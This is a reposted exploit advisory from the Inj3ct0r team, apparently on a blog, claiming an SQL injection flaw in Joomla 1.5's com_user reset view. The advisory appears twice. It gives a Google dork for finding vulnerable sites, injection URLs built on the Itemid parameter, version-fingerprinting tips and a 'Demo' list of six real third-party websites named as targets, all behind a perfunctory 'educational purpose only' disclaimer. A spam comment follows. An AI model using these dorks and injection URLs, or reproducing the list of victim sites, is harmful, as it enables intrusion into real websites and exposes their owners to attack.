| Filename | Joomla all v1.5 Error SQL Injection Vulnerability |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 6:31 AM |
| Label | |
| Action |
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ `\ \/\ \/_/_\_<_ /'___ / /`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit data**** separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Caddy-dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: Joomla All v1.5 Error ****d SQL Injection Vulnerability
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized *** application pentesting only!
// De******ion :
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]
# priv8 youtube link, just people who has the link could view : http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ `\ \/\ \/_/_\_<_ /'___ / /`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit data**** separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Caddy-dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: Joomla All v1.5 Error ****d SQL Injection Vulnerability
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized *** application pentesting only!
// De******ion :
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]
# priv8 youtube link, just people who has the link could view : http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='
1 comments:
Ever wanted to get free Twitter Re-tweets?
Did you know you can get these ON AUTO-PILOT & ABSOLUTELY FOR FREE by registering on Like 4 Like?
Post a Comment